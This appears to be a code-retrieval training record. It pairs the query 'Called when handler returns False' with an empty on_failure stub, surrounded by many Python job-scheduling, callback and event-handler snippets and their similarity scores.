myfunc.ReadFile(jobinfofile).strip()\n jobinfolist = jobinfo.split(\"\\t\")\n if len(jobinfolist) >= 8:\n numseq = int(jobinfolist[3])\n\n if 'DEBUG' in g_params and g_params['DEBUG']:\n webcom.loginfo(\"DEBUG: len(completed_idx_set)=%d+%d=%d, numseq=%d\\n\"%(len(idlist1), len(idlist2), len(completed_idx_set), numseq), gen_logfile)\n\n if len(completed_idx_set) < numseq:\n all_idx_list = [str(x) for x in range(numseq)]\n torun_idx_str_list = list(set(all_idx_list)-completed_idx_set)\n for idx in torun_idx_str_list:\n try:\n cntTryDict[int(idx)] += 1\n except (ValueError, IndexError, KeyError):\n cntTryDict[int(idx)] = 1\n myfunc.WriteFile(\"\\n\".join(torun_idx_str_list)+\"\\n\", torun_idx_file, \"w\", True)\n\n if 'DEBUG' in g_params and g_params['DEBUG']:\n webcom.loginfo(\"recreate torun_idx_file: jobid = %s, numseq=%d, len(completed_idx_set)=%d, len(torun_idx_str_list)=%d\\n\"%(jobid, numseq, len(completed_idx_set), len(torun_idx_str_list)), gen_logfile)\n else:\n myfunc.WriteFile(\"\", torun_idx_file, \"w\", True)\n else:\n if 'DEBUG' in g_params and g_params['DEBUG']:\n webcom.loginfo(\"DEBUG: %s: remotequeue_idx_file %s is not empty\\n\" %(jobid, remotequeue_idx_file), gen_logfile)\n# }}}\n\n text = \"\"\n if os.path.exists(remotequeue_idx_file):\n text = myfunc.ReadFile(remotequeue_idx_file)\n if text == \"\":\n return 1\n lines = text.split(\"\\n\")\n\n nodeSet = set([])\n for i in range(len(lines)):\n line = lines[i]\n if not line or line[0] == \"#\":\n continue\n strs = line.split(\"\\t\")\n if len(strs) != 6:\n continue\n node = strs[1]\n nodeSet.add(node)\n\n myclientDict = {}\n for node in nodeSet:\n wsdl_url = f\"http://{node}/pred/api_submitseq/?wsdl\"\n try:\n myclient = Client(wsdl_url, cache=None, timeout=30)\n myclientDict[node] = myclient\n except Exception as e:\n webcom.loginfo(f\"Failed to access {wsdl_url} with errmsg {e}\", gen_logfile)\n pass\n\n for i in range(len(lines)): # {{{\n line = lines[i]\n\n if 'DEBUG' in g_params and g_params['DEBUG']:\n myfunc.WriteFile(f\"Process {line}\\n\", gen_logfile, \"a\", True)\n if not line or line[0] == \"#\":\n if 'DEBUG' in g_params and g_params['DEBUG']:\n webcom.loginfo(\"DEBUG: line empty or line[0] = '#', ignore\", gen_logfile)\n continue\n strs = line.split(\"\\t\")\n if len(strs) != 6:\n if 'DEBUG' in g_params and g_params['DEBUG']:\n webcom.loginfo(\"DEBUG: len(strs)=%d (!=6), ignore\\n\"%(len(strs)), gen_logfile)\n continue\n origIndex = int(strs[0])\n node = strs[1]\n remote_jobid = strs[2]\n description = strs[3]\n seq = strs[4]\n submit_time_epoch = float(strs[5])\n subfoldername_this_seq = f\"seq_{origIndex}\"\n outpath_this_seq = os.path.join(outpath_result, subfoldername_this_seq)\n\n try:\n myclient = myclientDict[node]\n except KeyError:\n if 'DEBUG' in g_params and g_params['DEBUG']:\n webcom.loginfo(\"DEBUG: node (%s) not found in myclientDict, ignore\"%(node), gen_logfile)\n keep_queueline_list.append(line)\n continue\n try:\n rtValue = myclient.service.checkjob(remote_jobid)\n except Exception as e:\n msg = \"checkjob(%s) at node %s failed with errmsg %s\"%(remote_jobid, node, str(e))\n webcom.loginfo(msg, gen_logfile)\n rtValue = []\n pass\n isSuccess = False\n isFinish_remote = False\n status = \"\"\n if len(rtValue) >= 1:\n ss2 = rtValue[0]\n if len(ss2) >= 3:\n status = ss2[0]\n result_url = ss2[1]\n errinfo = ss2[2]\n\n if errinfo and errinfo.find(\"does not exist\") != -1:\n if 'DEBUG' in g_params and g_params['DEBUG']:\n msg = \"Failed for remote_jobid %s with errmsg %s\"%(remote_jobid, str(errinfo))\n webcom.loginfo(msg, gen_logfile)\n\n isFinish_remote = True\n\n if status == \"Finished\": # {{{\n isFinish_remote = True\n outfile_zip = f\"{tmpdir}/{remote_jobid}.zip\"\n isRetrieveSuccess = False\n myfunc.WriteFile(\"\\tFetching result for %s/seq_%d from %s \" % (\n jobid, origIndex, result_url), gen_logfile, \"a\", True)\n if myfunc.IsURLExist(result_url, timeout=5):\n try:\n myfunc.urlretrieve(result_url, outfile_zip, timeout=10)\n isRetrieveSuccess = True\n myfunc.WriteFile(f\" succeeded on node {node}\\n\", gen_logfile, \"a\", True)\n except Exception as e:\n myfunc.WriteFile(\" failed with %s\\n\"%(str(e)), gen_logfile, \"a\", True)\n pass\n if os.path.exists(outfile_zip) and isRetrieveSuccess:\n cmd = [\"unzip\", outfile_zip, \"-d\", tmpdir]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n rst_fetched = os.path.join(tmpdir, remote_jobid)\n if name_server.lower() == \"pconsc3\":\n rst_this_seq = rst_fetched\n elif name_server.lower() == \"boctopus2\":\n rst_this_seq = os.path.join(rst_fetched, \"seq_0\", \"seq_0\")\n rst_this_seq_parent = os.path.join(rst_fetched, \"seq_0\")\n else:\n rst_this_seq = os.path.join(rst_fetched, \"seq_0\")\n\n if os.path.islink(outpath_this_seq):\n os.unlink(outpath_this_seq)\n elif os.path.exists(outpath_this_seq):\n shutil.rmtree(outpath_this_seq)\n\n if os.path.exists(rst_this_seq) and not os.path.exists(outpath_this_seq):\n cmd = [\"mv\", \"-f\", rst_this_seq, outpath_this_seq]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n if name_server.lower() == \"boctopus2\":\n # move also seq.fa and time.txt for boctopus2\n file1 = os.path.join(rst_this_seq_parent, \"seq.fa\")\n file2 = os.path.join(rst_this_seq_parent, \"time.txt\")\n for f in [file1, file2]:\n if os.path.exists(f):\n try:\n shutil.move(f, outpath_this_seq)\n except:\n pass\n\n fafile_this_seq = os.path.join(outpath_this_seq, \"seq.fa\")\n if webcom.IsCheckPredictionPassed(outpath_this_seq, name_server):\n # relpace the seq.fa with original description\n myfunc.WriteFile('>%s\\n%s\\n'%(description, seq), fafile_this_seq, 'w', True)\n isSuccess = True\n\n if isSuccess:\n # delete the data on the remote server\n try:\n rtValue2 = myclient.service.deletejob(remote_jobid)\n except Exception as e:\n msg = \"Failed to deletejob(%s) on node %s with errmsg %s\"%(remote_jobid, node, str(e))\n webcom.loginfo(msg, gen_logfile)\n rtValue2 = []\n pass\n\n logmsg = \"\"\n if len(rtValue2) >= 1:\n ss2 = rtValue2[0]\n if len(ss2) >= 2:\n status = ss2[0]\n errmsg = ss2[1]\n if status == \"Succeeded\":\n logmsg = \"Successfully deleted data on %s \"\\\n \"for %s\"%(node, remote_jobid)\n else:\n logmsg = \"Failed to delete data on %s for \"\\\n \"%s\\nError message:\\n%s\\n\"%(node, remote_jobid, errmsg)\n else:\n logmsg = \"Failed to call deletejob %s via WSDL on %s\\n\"%(remote_jobid, node)\n\n # delete the downloaded temporary zip file and\n # extracted file\n if os.path.exists(outfile_zip):\n os.remove(outfile_zip)\n if os.path.exists(rst_fetched):\n shutil.rmtree(rst_fetched)\n\n # create or update the md5 cache\n if name_server.lower() == \"prodres\" and query_para != {}:\n md5_key = hashlib.md5((seq+str(query_para)).encode('utf-8')).hexdigest()\n else:\n md5_key = hashlib.md5(seq.encode('utf-8')).hexdigest()\n subfoldername = md5_key[:2]\n md5_subfolder = \"%s/%s\"%(path_cache, subfoldername)\n cachedir = \"%s/%s/%s\"%(path_cache, subfoldername, md5_key)\n\n # copy the zipped folder to the cache path\n origpath = os.getcwd()\n os.chdir(outpath_result)\n shutil.copytree(\"seq_%d\"%(origIndex), md5_key)\n cmd = [\"zip\", \"-rq\", \"%s.zip\"%(md5_key), md5_key]\n webcom.RunCmd(cmd, runjob_logfile, runjob_errfile)\n if not os.path.exists(md5_subfolder):\n os.makedirs(md5_subfolder)\n shutil.move(\"%s.zip\"%(md5_key), \"%s.zip\"%(cachedir))\n shutil.rmtree(md5_key) # delete the temp folder named as md5 hash\n os.chdir(origpath)\n\n # Add the finished date to the database\n date_str = time.strftime(g_params['FORMAT_DATETIME'])\n MAX_TRY_INSERT_DB = 3\n cnttry = 0\n while cnttry < MAX_TRY_INSERT_DB:\n t_rv = webcom.InsertFinishDateToDB(date_str, md5_key, seq, finished_date_db)\n if t_rv == 0:\n break\n cnttry += 1\n time.sleep(random.random()/1.0)\n\n# }}}\n elif status in [\"Failed\", \"None\"]:\n # the job is failed for this sequence, try to resubmit\n isFinish_remote = True\n if 'DEBUG' in g_params and g_params['DEBUG']:\n webcom.loginfo(\"DEBUG: %s, status = %s\\n\"%(remote_jobid, status), gen_logfile)\n\n if status != \"Wait\" and not os.path.exists(starttagfile):\n webcom.WriteDateTimeTagFile(starttagfile, runjob_logfile, runjob_errfile)\n\n if isSuccess: # {{{\n time_now = time.time()\n runtime1 = time_now - submit_time_epoch # in seconds\n timefile = os.path.join(outpath_this_seq, \"time.txt\")\n runtime = webcom.ReadRuntimeFromFile(timefile, default_runtime=runtime1)\n info_finish = webcom.GetInfoFinish(\n name_server, outpath_this_seq,\n origIndex, len(seq), description,\n source_result=\"newrun\", runtime=runtime)\n finished_info_list.append(\"\\t\".join(info_finish))\n finished_idx_list.append(str(origIndex))\n # }}}\n\n # if the job is finished on the remote but the prediction is failed,\n # try resubmit a few times and if all failed, add the origIndex to the\n # failed_idx_file\n if isFinish_remote and not isSuccess:\n cnttry = 1\n try:\n cnttry = cntTryDict[int(origIndex)]\n except KeyError:\n cnttry = 1\n if cnttry < g_params['MAX_RESUBMIT']:\n resubmit_idx_list.append(str(origIndex))\n cntTryDict[int(origIndex)] = cnttry+1\n else:\n failed_idx_list.append(str(origIndex))\n\n if not isFinish_remote:\n time_in_remote_queue = time.time() - submit_time_epoch\n # for jobs queued in the remote queue more than one day (but not\n # running) delete it and try to resubmit it. This solved the\n # problem of dead jobs in the remote server due to server\n # rebooting)\n if (\n status != \"Running\"\n and status != \"\"\n and time_in_remote_queue > g_params['MAX_TIME_IN_REMOTE_QUEUE']):\n # delete the remote job on the remote server\n try:\n rtValue2 = myclient.service.deletejob(remote_jobid)\n except Exception as e:\n webcom.loginfo(\"Failed to run myclient.service.deletejob(%s) on node %s with msg %s\"%(remote_jobid, node, str(e)), gen_logfile)\n rtValue2 = []\n pass\n else:\n keep_queueline_list.append(line)\n# }}}\n # Finally, write log files\n finished_idx_list = list(set(finished_idx_list))\n failed_idx_list = list(set(failed_idx_list))\n resubmit_idx_list = list(set(resubmit_idx_list))\n\n if len(finished_info_list) > 0:\n myfunc.WriteFile(\"\\n\".join(finished_info_list)+\"\\n\", finished_seq_file,\n \"a\", True)\n if len(finished_idx_list) > 0:\n myfunc.WriteFile(\"\\n\".join(finished_idx_list)+\"\\n\", finished_idx_file,\n \"a\", True)\n if len(failed_idx_list) > 0:\n myfunc.WriteFile(\"\\n\".join(failed_idx_list)+\"\\n\", failed_idx_file, \"a\",\n True)\n if len(resubmit_idx_list) > 0:\n myfunc.WriteFile(\"\\n\".join(resubmit_idx_list)+\"\\n\", torun_idx_file,\n \"a\", True)\n\n if len(keep_queueline_list) > 0:\n keep_queueline_list = list(set(keep_queueline_list))\n myfunc.WriteFile(\"\\n\".join(keep_queueline_list)+\"\\n\",\n remotequeue_idx_file, \"w\", True)\n else:\n myfunc.WriteFile(\"\", remotequeue_idx_file, \"w\", True)\n\n with open(cnttry_idx_file, 'w') as fpout:\n json.dump(cntTryDict, fpout)\n\n return 0", "def handle_result(self,result,event):\r\n # If the result is a number, according to the design we\r\n if isinstance(result,(int,float)):\r\n event.time=self.time+result\r\n # Hint: The reason which this event is added back to the queue is because the function executed is a generator.\r\n # That is to say, that function used a \"yield\" command. In the first round of execution, it yields the delay\r\n # time. Then, the event is added back to the queue to be executed the second time. In the second round, the\r\n # execution starts from where it left off in the first round. If you are not familiar with the concept of\r\n # generator, this is confusing. I was confused for a while. I recommend you figure out what a generator is\r\n # first.)-->\r\n self.add_event(event)\r\n # If the result is a dictionary,\r\n elif isinstance(result,dict):\r\n event.time=self.time+result.get('delay',0)\r\n event.priority=result.get('priority',event.priority)\r\n # If you are confused about why this event is added back to the queue, please refer to the above hint.\r\n self.add_event(event)\r\n elif isinstance(result,(str,Trigger)):\r\n event.time=None\r\n if result not in self.triggers:\r\n # Here we add function executions to the self.triggers dictionary.\r\n self.triggers[result]=[event]\r\n else:\r\n self.triggers[result].append(event)\r\n elif isinstance(result,(list,tuple)):\r\n events=[copy.copy(event) for r in result]\r\n for e in events: e.group=events\r\n for i,r in enumerate(result):\r\n self.handle_result(r,events[i])\r\n elif result is None:\r\n if event.parent is not None:\r\n event.parent.time=self.time\r\n self.add_event(event.parent)\r\n elif isinstance(result,Event):\r\n if result.generator and event.generator:\r\n result.parent=event\r\n elif hasattr(result,'default_trigger'):\r\n self.handle_result(result.default_trigger,event)\r\n else:\r\n raise SchedulerError(\"Incorrect 'yield': %s\"%(result))", "async def test_job_done(my_job):\n\n # Set up callback to get notifications when job state changes.\n job = None\n job_update_counter = 0\n\n def on_job_update(_job):\n \"\"\"The callback updates `job` and `job_update_counter`.\"\"\"\n nonlocal job, job_update_counter\n job = _job\n job_update_counter += 1\n # Assert that simple job is reported as cancelable only when it\n # is in the `PENDING` or `CANCELING` state.\n if job.state in ['PENDING', 'CANCELING']:\n assert job.is_cancelable, ( # pylint: disable=no-member\n 'Job is not cancelable when it must be cancelable!')\n else:\n assert not job.is_cancelable, ( # pylint: disable=no-member\n 'Job is cancelable when it must not be cancelable!')\n\n my_job.set_on_update(on_job_update)\n\n # Submit a job which must finish OK.\n new_job = await my_job.job(mustfail=False)\n\n # Check job instance of new job (returned from job function).\n assert new_job.is_cancelable, ( # pylint: disable=no-member\n 'Job instance states that just submitted job is not cancelable!')\n assert new_job.state == 'PENDING'\n assert new_job.id is not None\n assert new_job.started is None\n assert new_job.args == []\n assert new_job.kwds == {'mustfail': False}\n assert new_job.message == ''\n assert new_job.payload == {}\n assert new_job.readiness is None\n\n # Check current job state right after job is submitted.\n assert job.state == 'PENDING', ('Just submitted job has wrong state '\n f'`{job.state}`!')\n\n # Process ASGI messages and wait for the job to finish.\n await my_job.process_jobs()\n\n # Check job state when job is done.\n assert job.state == 'DONE', f'Finished job has wrong state `{job.state}`!'\n\n # Check that job update callback has been called three times:\n # 1. job is submitted\n # 2. job switches to the working state\n # 3. job finishes\n assert job_update_counter == 3, 'Job updated wrong number of times!'", "def put_external_result(self, job_result):\n self.result_queue.append(job_result)", "def _handle_task_not_succeeded(self):\n result = self.async_result.result\n\n if isinstance(result, exceptions.OperationRetry):\n # operation explicitly requested a retry, so we ignore\n # the handler set on the task.\n handler_result = HandlerResult.retry()\n handler_result.retry_after = result.retry_after\n return handler_result\n\n if self.is_subgraph:\n self.error = self.failed_task.error\n\n if self.on_failure:\n handler_result = self.on_failure(self)\n else:\n handler_result = HandlerResult.retry()\n\n if isinstance(result, exceptions.NonRecoverableError):\n handler_result = HandlerResult.fail()\n elif isinstance(result, exceptions.RecoverableError):\n handler_result.retry_after = result.retry_after\n\n return handler_result", "def _is_job_finished(self, job_id):\n complete, rc, status, result, task = False, 0, None, None, None\n job = self.get_job_by_id(job_id)\n if job:\n status = job['status']\n try:\n result, task = job['result'], job['task']\n except KeyError:\n pass\n if status.lower() == SUCCEEDED:\n complete = True\n elif status.lower() in INCOMPLETE_LIST:\n complete = False\n else:\n rc, complete = -1, True\n return complete, result, rc, status, task", "def isFinished(self):\r\n try:\r\n output = Popen(\"qstat | grep \"+self.jobId, shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]\r\n if self.jobId in output:\r\n if output.split()[4] == \"Eqw\":\r\n #If the job fails, print a warning, and wait a minute so the user can check why the job fails,\r\n #before resubmitting the job.\r\n logging.warning(\"job \" + output.split()[2] + \" failed to run, resubmitting in one minute\")\r\n time.sleep(60)\r\n output = Popen(\"qdel \"+self.jobId, shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]\r\n self.submit()\r\n return False\r\n else:\r\n logging.info(\"job with ID: \" + self.jobId + \" is finished.\")\r\n return True\r\n \r\n except ValueError:\r\n logging.info(\"Error: waiting for not submitted job...\")", "def process_result(self, result: Any) -> None:\n raise NotImplementedError()", "def process(self, job_id, job_service):\n print('Monitoring job %s' % job_id)\n local_job = Job.query.get(job_id)\n remote_job = job_service.get_job(local_job.remote_job_id)\n\n # TODO: catch saga.IncorrectState\n remote_job_state = remote_job.state\n\n if local_job.last_status != remote_job_state:\n self.send_notifications(local_job, remote_job)\n self.download_files(local_job, remote_job, job_service)\n self.update_state(local_job, remote_job)\n\n # Add task back to the queue if still running\n if remote_job_state not in (saga.FAILED,\n saga.DONE,\n saga.CANCELED,\n saga.FINAL,\n saga.EXCEPTION):\n self.send((job_id, job_service))", "def v2_runner_on_ok(self, result, **kwargs):\n host = result._host\n task = result._task\n output = result._result\n if result._result.get('changed', False):\n status = 'changed'\n else:\n status = 'ok'\n self.results.append({\"host\": host.name, \"action\":task.action, \"status\":status, \"output\": output})", "def process(self):\n return self.check()", "def test_setting_result_fires_signal(self):\n # Remember both new and old result for verification\n new_result = make_job_result()\n old_result = self.job_state.result\n\n def changed_callback(old, new):\n # Verify that new and old are correct and not swapped\n self.assertIs(new, new_result)\n self.assertIs(old, old_result)\n # Set a flag that we verify below in case this never gets called\n self.on_changed_fired = True\n # Connect the signal handler\n self.job_state.on_result_changed.connect(changed_callback)\n # Assign the new result\n self.job_state.result = new_result\n # Ensure that the signal was fired and called our callback\n self.assertTrue(self.on_changed_fired)", "def on_failure(self):\n if self.args.disable_rollback is True:\n on_failure = None\n else:\n on_failure = self.args.on_failure\n return on_failure", "def process_image(self, **kwargs):\n try:\n img = self.current_image\n\n if self.is_vis:\n result = self._process_job_vis(img, **kwargs)\n elif self.is_nir:\n result = self._process_job_nir(img, **kwargs)\n elif self.is_fluo:\n result = self._process_job_fluo(img, **kwargs)\n else:\n raise NotImplementedError\n\n except Exception as e:\n print(\n 'Failed to process image: \"{}\", because \"{}\"'.format(\n self.file_path, repr(e)\n )\n )\n self.print_images()\n return False\n\n self.print_images()\n\n return result", "def run(self):\n\n try:\n self.send_alert('SUCCESS', \"Job START\", None)\n self.cron_process()\n self.send_alert('SUCCESS', \"Job FINAL\", None)\n sys.exit(0)\n\n except Exception:\n alert_data = self.build_error_output()\n self.send_alert('FAILURE', 'Failure during Job', alert_data)\n sys.exit(1)", "def _success_handler(details):\n LOGGER.debug('[Backoff]: Completed after %d tries calling %s',\n details['tries'],\n details['target'].__name__)", "def test_calls_error_callback(self):\n from furious.async import Async\n from furious.context._execution import _ExecutionContext\n from furious.processors import run_job\n\n call_count = []\n handle_count = []\n\n def handle_success():\n call_count.append(1)\n\n def handle_errors():\n handle_count.append(1)\n\n work = Async(target=dir, args=[1, 2],\n callbacks={'success': handle_success,\n 'error': handle_errors})\n\n with _ExecutionContext(work):\n run_job()\n\n self.assertEqual(1, len(handle_count),\n \"Error handler called wrong number of times.\")\n self.assertEqual(0, len(call_count),\n \"Success handler unexpectedly called.\")", "def on_job_result(self, job, result):\n job_id = job.tag\n parities = result.histogram(key='out',\n fold_func=lambda bits: np.sum(bits) % 2)\n self._zeros[job_id] += parities[0]\n self._ones[job_id] += parities[1]", "async def execute(self):\n return True", "async def execute(self):\n return True" ]
[ "0.6380917", "0.630514", "0.6203368", "0.6140142", "0.6020525", "0.5998409", "0.5967726", "0.5962727", "0.59392214", "0.59327286", "0.59168214", "0.59048873", "0.5869822", "0.5861403", "0.58348876", "0.57895267", "0.57549196", "0.5748723", "0.5741472", "0.5715548", "0.5704743", "0.5670206", "0.56546664", "0.56533074", "0.56120205", "0.5581982", "0.5580021", "0.5554732", "0.55489725", "0.5546846", "0.554489", "0.5513459", "0.5512138", "0.55061173", "0.5501268", "0.5498488", "0.5459026", "0.5457164", "0.54485667", "0.5444492", "0.54236156", "0.5422567", "0.5419994", "0.541954", "0.5407903", "0.5394093", "0.53930146", "0.5382794", "0.53734446", "0.53599507", "0.5359034", "0.535374", "0.5351571", "0.53488684", "0.5348177", "0.5345735", "0.5330472", "0.5327798", "0.5326435", "0.5318468", "0.53160596", "0.5309246", "0.53068095", "0.5290059", "0.5288236", "0.52686816", "0.52665615", "0.5259302", "0.5252993", "0.52525884", "0.52469087", "0.5242887", "0.5238433", "0.5238101", "0.5235252", "0.52304727", "0.52295136", "0.5227828", "0.52178085", "0.52175045", "0.52168506", "0.5210493", "0.5200998", "0.51972693", "0.5196555", "0.5190261", "0.5185853", "0.51806873", "0.5178186", "0.51737106", "0.5173497", "0.5168346", "0.51611906", "0.5160417", "0.5158301", "0.51582515", "0.515617", "0.5155603", "0.5155496", "0.5154296", "0.5154296" ]
0.0
-1
Called when handler returns True
def on_success(self): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def handler(self, *args, **kwargs):\n return True", "def on_success(self) -> None:", "def handle(self) -> None:", "def ok_callback(self):\n pass", "def event_handler(self, response):\n pass", "def justhandle(self, rawdata):\r\n\r\n return self.__handler(rawdata)", "def response(self, context, message):\r\n return True", "def handle(self):", "async def _response_handler(self):", "def query_handler(self, handler_name=\"\"):\n\t\treturn False", "def OnSuccess(self):\n pass", "def dummy_callback_handler(self, ret):\n pass", "def handle_once(self):\n return self.__handle_once", "def callback(self):\n pass # pragma: no cover", "def handleContentComplete():", "def handler(self):\n\t\treturn self.handle_request", "def _handle(self, *args, **options):\n return super()._handle(*args, **options)", "def onDone(self):\n pass", "def add_handler(self, handler):\n pass", "def on_response(self, response):\n pass", "def handle(self, data):\n pass", "def post_execute(self):", "def PostExecute(self):\n return True", "def register_handler(self, handler):\r\n self.handler = handler", "def on(self) -> None:", "def _handler_changed(self, handler):\n if self.next is not None:\n self.next.handler = handler", "def handle(self, rawdata):\r\n\r\n return self.__filter(self.__handler(rawdata))", "def run_handler(self, handler):\n self.last_activity = time.time()\n const_name = handler.upper()\n try:\n const_value = getattr(cwiid, const_name)\n if self.wm.state['buttons'] == const_value:\n self.exec_script(handler)\n except AttributeError:\n return 0", "def process(self):\n return False", "def on_event(self, evt):\n\t\treturn False", "def _handle_task_succeeded(self):\n if self.on_success:\n return self.on_success(self)\n else:\n return HandlerResult.cont()", "def handle(self, message):", "def prepare(self):\n return HandlerReady()", "def ok_callback(self):\n self.rokucontrol.ok_callback()", "def _on_connection_success(self):\n if self.connect_handler:\n self.connect_handler()", "def done(self):", "def done(self):", "def on(self):", "def on_finish(self):", "def handle_event(self, event):", "def on(self) -> None:\n ...", "def error(self, handler):\n pass", "def on_event_finished(self, event):", "def callback(self):\n try:\n function()\n finally:\n main_loop.remove_handler(handler[0])", "def handler(self):\n\t\tself.exitClient()", "def unhandled(self):\n return True", "def consume(self, handler) -> None:\n pass # pragma: no cover", "def on_run(self):\r\n\r\n\t\tpass", "def handle_event(self, event):\n pass", "def done(self):\n return False", "def dispatch_any(self, request, handler, *args, **kwargs):\r\n return handler(request, *args, **kwargs)", "def proceed(self):\n pass", "def handler_ready(self, handler):\n logging.info(\"Handler ready %s\", handler.name())\n key = handler.rpc_key[6:]\n if handler.rpc_key.startswith(\"server:\"):\n pool_src, pool_dst = self._client_pool, self._server_pool\n timeout = self.timeout_server\n else:\n pool_src, pool_dst = self._server_pool, self._client_pool\n timeout = self.timeout_client\n\n if key in pool_src:\n self._pair_up(pool_src.pop(key), handler)\n return\n elif key not in pool_dst:\n pool_dst[key] = handler\n def cleanup():\n \"\"\"Cleanup client connection if timeout\"\"\"\n if pool_dst.get(key, None) == handler:\n logging.info(\"Timeout client connection %s, cannot find match key=%s\",\n handler.name(), key)\n pool_dst.pop(key)\n handler.send_data(struct.pack('@i', RPC_MAGIC + 2))\n handler.signal_close()\n self.loop.call_later(timeout, cleanup)\n else:\n logging.info(\"Duplicate connection with same key=%s\", key)\n handler.send_data(struct.pack('@i', RPC_MAGIC + 1))\n handler.signal_close()", "def _finished(self) -> None:", "def test_updated_handler_called(self):\n self.client.ensure_path(\"/services/db/1.1.1.1\")\n self.client.set(\"/services/db/1.1.1.1\",\n json.dumps({\"enabled\": \"1\"}))\n handler = Mock()\n z = ZkFarmExporter(self.client, \"/services/db\", self.conf, handler)\n z.loop(2, timeout=self.TIMEOUT)\n self.client.set(\"/services/db/1.1.1.1\",\n json.dumps({\"enabled\": \"0\"}))\n z.loop(1, timeout=self.TIMEOUT)\n handler.assert_called_once_with()", "def after_send(self):", "def set_handler(self, handler):\n self.next_handler = handler", "def done(self) -> bool:", "def on_response(self, response):\n log.debug(\"Received response: %s\", response)", "def handle(self):\n raise NotImplementedError", "def _is_done(self):\n pass", "def connection_handler(self):\n\t\tyield", "def __handle(self):\n\n if not self.entrada.closed:\n linea = self.salida.readline()\n tamanio = None\n\n if linea:\n #if 'Playing' in linea:\n # self.uri = linea.split()[-1]\n\n if 'dump:' in linea:\n tamanio = int(int(linea.split()[1]) / 1024)\n\n if self.uri and tamanio:\n uri = self.uri\n if len(self.uri) > 25:\n uri = str(self.uri[0:25]) + \" . . . \"\n\n info = \"Grabando: %s - %s Kb\" % (\n uri, str(tamanio))\n\n if self.info != info:\n self.info = info\n self.emit('update', self.info)\n\n return True", "def handle_accept(self):\r\n pass", "def _hook(self):", "def _handler_direct_access_exit(self, *args, **kwargs):", "def process(self, event):\n pass", "def on_finish(self):\n pass", "def make_new_handler(self, *args, **kwargs):", "def handle_success_request(self) -> HttpResponse:\n raise NotImplementedError", "def bofore_response_handle(self, func):\n self.before_response.append(func)\n return func", "def onfinish():", "def handle(event={}, context={}):\n LoLServerStatusHandler().run()\n return 'ok'", "def on_run(self):\n pass", "def on_hook(self) -> None:", "def action_done(self):", "def responseHandler(self, factory):\n pass", "def onfinish( request ):", "def onfinish( request ):", "def _onOk(self):\n\n self.accepted = True\n self.close()", "def _onOk(self):\n\n self.accepted = True\n self.close()", "def _do_action(self, handler: 'Handler') -> CanDo:\n pass", "def _on_message(self, raw_msg):\n strmsg = raw_msg.decode()\n msg = json.loads(strmsg)\n\n print(msg)\n\n if self._handlers.get(msg['msgid']):\n for handler in self._handlers[msg['msgid']]:\n handler.handle(msg)", "def handle_response(self):\r\n call_if_not_none_and_callable(self._eventHandlers.popleft(),\r\n response=self.response)", "def request() -> None:\n\t_flag.set()", "def handleEvent(self, event):\n pass", "def perform_callback(self, *args, **kwargs):\n pass", "def action_done(self):\n pass", "def finished(self):", "def handle(self, *args, **kwargs):\n raise NotImplementedError()", "def callback(self, *args):\n raise NotImplementedError()", "def process_server_response(self, server_response):", "def acknowledged(self):\n ...", "def _signal_handler(*args):\n self._user_exit = True", "def responder():\n pass", "def finished(self, reply):\n pass", "def process_event(self, event):\r\n pass", "def process(self, msg):\n print \"HANDLER: received a msg: %s\" % msg", "def _handle_request(self, method, url, handler):\n if not(method in self.handlers):\n handler.set_status(405) # Method Not Allowed\n handler.write({})\n return\n for (path, fn) in self.handlers[method].items():\n if re.match(path, url):\n fn(url, handler)\n return\n handler.set_status(404) # Not Found\n handler.write({})", "def next(self, event):\n self.result = 1" ]
[ "0.8078143", "0.6831724", "0.6803624", "0.6726275", "0.67239153", "0.67041284", "0.66923994", "0.6612446", "0.659153", "0.6590828", "0.6533328", "0.6532542", "0.6480587", "0.6457898", "0.63366073", "0.6306607", "0.63060313", "0.6250639", "0.62399155", "0.62257975", "0.6218537", "0.62135744", "0.6208803", "0.61905444", "0.6188409", "0.61707354", "0.6170192", "0.6163955", "0.61437315", "0.6090287", "0.60897756", "0.6087602", "0.60763055", "0.6059096", "0.6048846", "0.60362226", "0.60362226", "0.60259247", "0.600785", "0.60034657", "0.5991488", "0.5988472", "0.5985149", "0.5984868", "0.59792036", "0.5967051", "0.59615475", "0.5956799", "0.5956673", "0.5954524", "0.59363884", "0.59355295", "0.59218884", "0.5900156", "0.5889209", "0.5872656", "0.5863483", "0.58576584", "0.5850296", "0.58467865", "0.5846461", "0.5839647", "0.5833882", "0.58311594", "0.5826011", "0.5823318", "0.58227754", "0.5816027", "0.5812118", "0.5806703", "0.5799211", "0.57964087", "0.5778248", "0.5775059", "0.5771104", "0.5755413", "0.5744862", "0.57437074", "0.57437074", "0.5736968", "0.5736968", "0.57298017", "0.57247716", "0.5712043", "0.5708975", "0.57070845", "0.5706784", "0.57044786", "0.57021976", "0.5701135", "0.5698657", "0.56954247", "0.56949127", "0.5693889", "0.5693593", "0.56924033", "0.5689979", "0.5686046", "0.56834286", "0.5683103" ]
0.67066246
5
Called when handler returns False
def on_failure(self): pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def handler(self, *args, **kwargs):\n return True", "def dummy_callback_handler(self, ret):\n pass", "def unhandled(self):\n return True", "def set_as_handled(self):\n self.not_handled = False", "async def unhandled_response(self, pkt, source):\n if False:\n yield None", "def handle_uncaught_event(self, event):\r\n if widget.Widget.handle_uncaught_event(self, event):\r\n app.App.handle_uncaught_event(self, event)\r\n return True\r\n return False", "def on_event(self, evt):\n\t\treturn False", "def justhandle(self, rawdata):\r\n\r\n return self.__handler(rawdata)", "def error(self, handler):\n pass", "def handle_response(self):\r\n call_if_not_none_and_callable(self._eventHandlers.popleft(),\r\n response=self.response)", "def _handler_direct_access_exit(self, *args, **kwargs):", "def on_access_deny(self, handler):\n print \"User with {0} has been DENIED access.\".format(\n handler.client_address[0]\n )\n time.sleep(2) # lets annoy user if it is denied access", "def remove_handler(self, handler):\n pass", "def query_handler(self, handler_name=\"\"):\n\t\treturn False", "def _handler_direct_access_exit(self, *args, **kwargs):\n pass", "def _handler_direct_access_exit(self, *args, **kwargs):\n pass", "def handle(self) -> None:", "def callback(self):\n try:\n function()\n finally:\n main_loop.remove_handler(handler[0])", "def halt_async_handle_updates(self):\n self._halt = True", "def process(self):\n return False", "async def _noop_error_handler(ctx: 